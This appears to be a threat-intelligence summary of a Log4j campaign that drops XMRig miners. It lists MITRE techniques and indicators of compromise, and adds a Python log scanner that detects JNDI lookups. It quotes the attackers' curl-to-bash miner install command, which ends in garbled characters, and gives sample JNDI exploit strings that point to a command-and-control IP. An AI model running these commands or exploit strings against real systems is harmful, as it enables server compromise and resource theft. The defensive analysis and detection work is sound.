The Uptycs Threat Research Team uncovered a large-scale Log4j campaign that actively deploys XMRig miners across thousands of hosts. The operation exploits CVE-2021-44228 via crafted HTTP requests and JNDI lookups to fetch payloads and drop miner malware on targeted systems.
Hashtags: #XMRig #Log4j #CVE-2021-44228 #JNDI #Lazarus #APT28 #NineRAT #DLRAT #BottomLoader #Kinsing #NightSky
Key points
- The campaign is active with 1700+ dedicated IPs implicated in its operations.
- The ultimate objective is to deploy the XMRig cryptominer onto targeted systems.
- The exploitation centers on CVE-2021-44228 in Apache Log4j 2, with PoCs and in-the-wild activity observed.
- Infection starts with a crafted HTTP request: Log4j logs the exploit string carried in the HTTP User-Agent header, and the resulting JNDI lookup makes the server reach out to attacker-controlled infrastructure.
- Attackers use a four-homed C2 setup to distribute XMRig (and occasionally Mirai or Gafgyt) payloads across compromised hosts.
- Windows malware (NineRAT, DLRAT, BottomLoader) and Linux malware (Kinsing, NightSky, Mirai, Tsunami, Muhstik) appear in campaigns tied to Log4j exploitation.
- Geographic distribution shows China as the leading region, followed by several other countries; Uptycs XDR provides YARA-based detection and toolkit insights.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attacker sends a crafted HTTP request to a system running Log4j; Log4j writes a log entry containing the exploit string supplied in the HTTP User-Agent header, which is what triggers the lookup. “The infection sequence initiates with the transmission of a meticulously crafted HTTP request by an attacker to a designated system employing Log4j. Subsequently, Log4j generates a log entry incorporating the exploit string designated within the HTTP user-agent header.”
- [T1105] Ingress Tool Transfer – After compromising a victim, the attacker fetches a shell script for deploying the XMRig miner or other malware. “subsequent to compromising a victim machine, it initiated contact with a URL to fetch a shell script for the deployment of the XMRig miner, or alternatively, in select instances, it disseminated Mirai or Gafgyt malware.”
- [T1059.004] Unix Shell – On Linux hosts the miner setup script is fetched with curl and piped straight into bash, with the attacker's wallet address passed as the script argument. “curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGNì=»”
- [T1027] Obfuscated/Compressed Files and Information – Encoded/base64 payloads identified within the campaign. “Base64 code has also been identified, as shown in below figure 2.”
- [T1496] Resource Hijacking – The final payload drops the XMRig cryptominer. “which drops the XMRig cryptominer malware.”
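The T1190 step above is the one a defender can see in ordinary web server logs: the JNDI lookup string arrives in a request header and is written to the access log before anything else happens. The following Python is an added example (not code from the Uptycs report) that scans Combined Log Format lines for a `${jndi:` lookup in the User-Agent, request line or Referer, collapses the `${lower:..}`/`${upper:..}` nesting that is commonly used to split the keyword, and checks whether the lookup target is one of the hosts listed in the Indicators of Compromise section. The log lines, the timestamp and the 203.0.113.9 address are constructed for the demonstration.

```python
import re

# Hosts taken from the Indicators of Compromise section of this report.
IOC_HOSTS = {
    "139.99.171.1", "146.59.16.84", "200.150.202.54", "200.150.205.65",
    "95.214.27.7", "download.c3pool.org", "cdn.x4b.lol",
}

# Apache/nginx Combined Log Format:
#   client ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# ${lower:x} / ${upper:x} wrappers around single characters are used to
# break up the literal "jndi" keyword; unwrap them before matching.
WRAPPER_RE = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)

# After normalisation: ${jndi:<scheme>://<host>...
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>[^:/}\s]+)', re.IGNORECASE)


def normalize(value):
    """Repeatedly strip lower/upper wrappers until the string stops changing.

    Only these two wrappers are handled here; other Log4j lookup forms would
    need their own normalisation rules.
    """
    prev = None
    while prev != value:
        prev = value
        value = WRAPPER_RE.sub(lambda m: m.group(1), value)
    return value


def inspect(line):
    """Return an alert dict for a log line containing a JNDI lookup, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("ua", "req", "ref"):
        hit = JNDI_RE.search(normalize(m.group(field)))
        if hit:
            host = hit.group("host")
            return {
                "src": m.group("ip"),
                "ts": m.group("ts"),
                "field": field,
                "scheme": hit.group("scheme").lower(),
                "host": host,
                "known_ioc": host in IOC_HOSTS,
            }
    return None


def scan(lines):
    """Run inspect() over an iterable of log lines and collect the alerts."""
    return [alert for alert in map(inspect, lines) if alert]


# Constructed sample log lines (not from the report): one benign request,
# one plain lookup pointing at an IoC host, one nested-wrapper lookup
# pointing at a documentation-range address that is not in the IoC list.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://200.150.205.65:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.9:1389/x}"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        flag = "KNOWN IOC" if alert["known_ioc"] else "unlisted host"
        print(f'{alert["ts"]} {alert["src"]} {alert["field"]} {alert["scheme"]}://{alert["host"]} [{flag}]')
```

Matching on the normalised string rather than the raw one is the point of the example: a rule that only looks for the literal `${jndi:` misses the nested form in the third sample line even though it produces exactly the same lookup. Hosts that are not in the IoC list still deserve an alert; the `known_ioc` flag only raises the priority.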
Indicators of Compromise
- [IP] 139.99.171.1 – used as a C2-related host in the campaign (port 3306 referenced).
- [IP] 146.59.16.84 – another C2-related host (port 3306 referenced).
- [IP] 200.150.202.54 – observed in campaign artifacts and C2 activity.
- [IP] 200.150.205.65 – observed in the C2 table and payload delivery.
- [IP] 95.214.27.7 – used in campaign payload delivery and C2 activity.
- [Domain] download.c3pool.org – host for miner deployment scripts.
- [Domain] cdn.x4b.lol – used as part of the infrastructure.
- [URL] http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh – payload deployment script.
- [URL] http://200.150.205.65/8UsA.sh – downloaded script as part of the campaign.
- [URL] http://95.214.27.7/base/customx86 – miner-related payload.
- [URL] https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh – alternative miner deployment script.
- [SHA256] 6731b2b5441e4782b8ca3a373a610993c049860e5afa862b9950d58060b0dcfe
- [SHA256] 6c62a1b489409cb30e93bba0ee7042d780e22268f2e7a603fb39615aa5c19fab
- [SHA256] c3ab1f5e612afac2e6bcbec0f6b4316853e3168f274540d97701bd21564fec9d
- [SHA256] 21e45b71b4fa863a6402df03158229ce9ca13969eb240dc899b8ae28e43e82a6
Read more: https://www.uptycs.com/blog/log4j-campaign-xmrig-malware